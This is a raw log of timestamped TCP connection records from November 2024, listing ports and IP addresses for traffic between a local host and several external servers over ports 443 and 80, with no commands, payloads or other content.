Nov 11, 2024 10:33:29.541575909 CET	443	49897	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.541695118 CET	49897	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.555090904 CET	49896	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.555090904 CET	49896	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.555111885 CET	443	49896	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.555118084 CET	443	49896	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.559942961 CET	49897	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.559958935 CET	443	49897	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.559969902 CET	49897	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.559974909 CET	443	49897	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.588862896 CET	443	49899	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.600045919 CET	49899	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.600061893 CET	443	49899	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.600887060 CET	49899	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.600892067 CET	443	49899	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.605564117 CET	49902	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.605606079 CET	443	49902	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.605700970 CET	49902	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.605902910 CET	49902	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.605916977 CET	443	49902	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.607042074 CET	49903	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.607072115 CET	443	49903	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.607141972 CET	49903	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.607801914 CET	49903	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.607815027 CET	443	49903	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.611057997 CET	443	49901	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.612276077 CET	49901	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.612288952 CET	443	49901	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.612925053 CET	49901	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.612929106 CET	443	49901	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.632054090 CET	443	49900	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.633572102 CET	49900	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.633606911 CET	443	49900	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.634403944 CET	49900	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.634409904 CET	443	49900	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.690182924 CET	443	49899	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.690251112 CET	443	49899	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.690337896 CET	49899	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.690560102 CET	49899	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.690571070 CET	443	49899	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.690581083 CET	49899	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.690587997 CET	443	49899	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.693509102 CET	49904	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.693523884 CET	443	49904	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.693614960 CET	49904	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.693763018 CET	49904	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.693774939 CET	443	49904	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.703758955 CET	443	49901	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.704912901 CET	443	49901	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.704983950 CET	49901	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.705017090 CET	49901	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.705027103 CET	443	49901	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.705038071 CET	49901	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.705048084 CET	443	49901	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.707503080 CET	49905	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.707556009 CET	443	49905	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.707695007 CET	49905	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.707845926 CET	49905	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.707863092 CET	443	49905	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.724621058 CET	443	49900	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.724684954 CET	443	49900	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.724845886 CET	49900	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.724936962 CET	49900	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.724936962 CET	49900	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.724953890 CET	443	49900	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.724961996 CET	443	49900	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.727787971 CET	49906	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.727799892 CET	443	49906	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.728085041 CET	49906	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.728226900 CET	49906	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.728240967 CET	443	49906	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.781037092 CET	443	49898	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:29.794986010 CET	49898	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:29.795002937 CET	443	49898	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:29.814093113 CET	49907	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:29.814126968 CET	443	49907	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:29.814203024 CET	49907	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:29.814502954 CET	49907	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:29.814519882 CET	443	49907	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:29.814874887 CET	49898	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:29.814874887 CET	49898	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:29.814888000 CET	443	49898	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:29.814905882 CET	443	49898	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:29.950424910 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:29.950498104 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:29.981184959 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:29.986341953 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:30.119540930 CET	443	49902	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.120084047 CET	49902	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.120107889 CET	443	49902	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.120806932 CET	49902	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.120816946 CET	443	49902	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.121153116 CET	443	49903	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.121695042 CET	49903	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.121714115 CET	443	49903	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.122428894 CET	49903	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.122433901 CET	443	49903	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.345211983 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:30.345292091 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:30.346904993 CET	443	49907	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.347202063 CET	49907	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.347220898 CET	443	49907	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.348180056 CET	443	49907	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.348268986 CET	49907	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.349359989 CET	49907	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.349421978 CET	443	49907	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.349760056 CET	49907	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.349766970 CET	443	49907	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.350047112 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:30.356901884 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:30.356978893 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:30.357112885 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:30.363739967 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:30.377373934 CET	443	49898	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:30.377393961 CET	443	49898	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:30.377427101 CET	443	49898	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:30.377459049 CET	49898	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:30.377470016 CET	443	49898	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:30.377522945 CET	49898	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:30.378102064 CET	49898	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:30.378108025 CET	443	49898	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:30.378205061 CET	49898	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:30.378273010 CET	443	49898	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:30.378309011 CET	443	49898	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:30.378489017 CET	49898	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:30.430138111 CET	443	49902	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.430218935 CET	443	49902	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.430319071 CET	49902	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.430643082 CET	49902	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.430663109 CET	443	49902	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.431669950 CET	443	49904	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.432249069 CET	49904	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.432277918 CET	443	49904	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.432369947 CET	443	49903	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.432440996 CET	443	49903	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.432524920 CET	49903	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.432693005 CET	49904	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.432697058 CET	443	49904	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.432991982 CET	49903	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.433006048 CET	443	49903	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.435858965 CET	49909	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.435889959 CET	443	49909	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.436134100 CET	49909	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.436491966 CET	49910	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.436516047 CET	443	49910	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.436521053 CET	49909	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.436532974 CET	443	49909	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.436661959 CET	49910	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.436872959 CET	49910	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.436887026 CET	443	49910	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.439582109 CET	443	49905	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.439836025 CET	49911	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:30.439861059 CET	443	49911	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:30.440196037 CET	49905	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.440212011 CET	443	49905	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.440226078 CET	49911	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:30.440571070 CET	443	49906	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.441024065 CET	49906	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.441039085 CET	443	49906	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.441070080 CET	49905	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.441076040 CET	443	49905	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.441523075 CET	49906	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.441526890 CET	49911	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:30.441528082 CET	443	49906	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.441549063 CET	443	49911	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:30.443684101 CET	443	49907	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.443753958 CET	49907	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.443770885 CET	443	49907	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.443833113 CET	443	49907	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.444345951 CET	49907	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.445126057 CET	49907	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.445136070 CET	443	49907	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.453181028 CET	49912	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.453221083 CET	443	49912	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.454593897 CET	49912	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.454864025 CET	49912	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.454883099 CET	443	49912	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.526870966 CET	443	49904	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.526930094 CET	443	49904	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.527101040 CET	49904	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.527370930 CET	49904	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.527386904 CET	443	49904	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.527401924 CET	49904	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.527406931 CET	443	49904	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.530328035 CET	49913	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.530359030 CET	443	49913	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.530651093 CET	49913	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.530879974 CET	49913	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.530895948 CET	443	49913	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.534250021 CET	443	49905	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.534677982 CET	443	49905	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.534774065 CET	49905	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.534804106 CET	49905	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.534804106 CET	49905	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.534825087 CET	443	49905	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.534836054 CET	443	49905	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.535687923 CET	443	49906	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.535903931 CET	443	49906	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.536000013 CET	49906	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.536070108 CET	49906	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.536075115 CET	443	49906	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.536083937 CET	49906	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.536088943 CET	443	49906	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.537444115 CET	49914	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.537478924 CET	443	49914	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.537564039 CET	49914	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.537784100 CET	49914	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.537801981 CET	443	49914	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.538139105 CET	49915	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.538146973 CET	443	49915	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.538202047 CET	49915	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.538327932 CET	49915	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.538340092 CET	443	49915	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.881061077 CET	443	49912	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.881664038 CET	49912	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.881690025 CET	443	49912	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.882026911 CET	443	49912	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.882339001 CET	49912	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.882404089 CET	443	49912	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.882489920 CET	49912	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.927330017 CET	443	49912	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.951653004 CET	443	49909	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.952378035 CET	49909	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.952409983 CET	443	49909	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.952440977 CET	443	49910	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.953449011 CET	49909	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.953459024 CET	443	49909	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.953764915 CET	49910	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.953794956 CET	443	49910	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.954324007 CET	49910	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:30.954329967 CET	443	49910	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:30.970769882 CET	49912	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.975200891 CET	443	49912	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.975229025 CET	443	49912	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.975240946 CET	443	49912	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.975261927 CET	443	49912	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.975286007 CET	49912	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.975307941 CET	443	49912	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.975333929 CET	49912	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.975342035 CET	443	49912	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.975383043 CET	49912	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.977441072 CET	49912	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.977463007 CET	443	49912	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.982980013 CET	49916	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.983019114 CET	443	49916	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.986521959 CET	49916	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.986742020 CET	49916	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:30.986757994 CET	443	49916	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:30.995791912 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:30.995809078 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:30.995820999 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:30.995834112 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:30.995873928 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:30.995902061 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:30.996484995 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:30.996532917 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:30.996547937 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:30.996573925 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:30.996623039 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:30.996640921 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:30.996653080 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:30.996665001 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:30.996694088 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:30.996722937 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.000741005 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.000756025 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.000832081 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.042769909 CET	443	49913	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.043590069 CET	49913	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.043606043 CET	443	49913	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.044162989 CET	49913	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.044168949 CET	443	49913	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.044255972 CET	443	49909	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.044347048 CET	443	49909	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.044409990 CET	49909	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.044543982 CET	49909	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.044569016 CET	443	49909	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.044588089 CET	49909	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.044595957 CET	443	49909	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.046283960 CET	443	49910	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.046452045 CET	443	49910	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.046578884 CET	49910	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.046988964 CET	49910	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.047005892 CET	443	49910	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.047019005 CET	49910	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.047024012 CET	443	49910	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.048679113 CET	49917	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.048728943 CET	443	49917	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.048996925 CET	49917	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.049151897 CET	49917	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.049164057 CET	443	49917	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.050354004 CET	49918	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.050393105 CET	443	49918	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.050493956 CET	49918	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.050632000 CET	49918	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.050647974 CET	443	49918	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.052439928 CET	443	49915	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.052531004 CET	443	49914	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.052912951 CET	49915	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.052925110 CET	443	49915	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.053117037 CET	49914	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.053142071 CET	443	49914	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.053508997 CET	49914	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.053517103 CET	443	49914	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.053550005 CET	49915	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:31.053554058 CET	443	49915	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:31.108622074 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.108647108 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.108659029 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.108674049 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.108722925 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.108750105 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.108959913 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.108972073 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.108983040 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.108993053 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.109005928 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.109016895 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.109031916 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.109042883 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.109685898 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.109759092 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.109770060 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.109781981 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.109792948 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.109833956 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.109863043 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.110515118 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.110528946 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.110551119 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.110562086 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.110568047 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.110573053 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.110620975 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.111393929 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.111406088 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.111418009 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.111465931 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.113513947 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.113535881 CET	80	49908	185.215.113.16	192.168.2.5
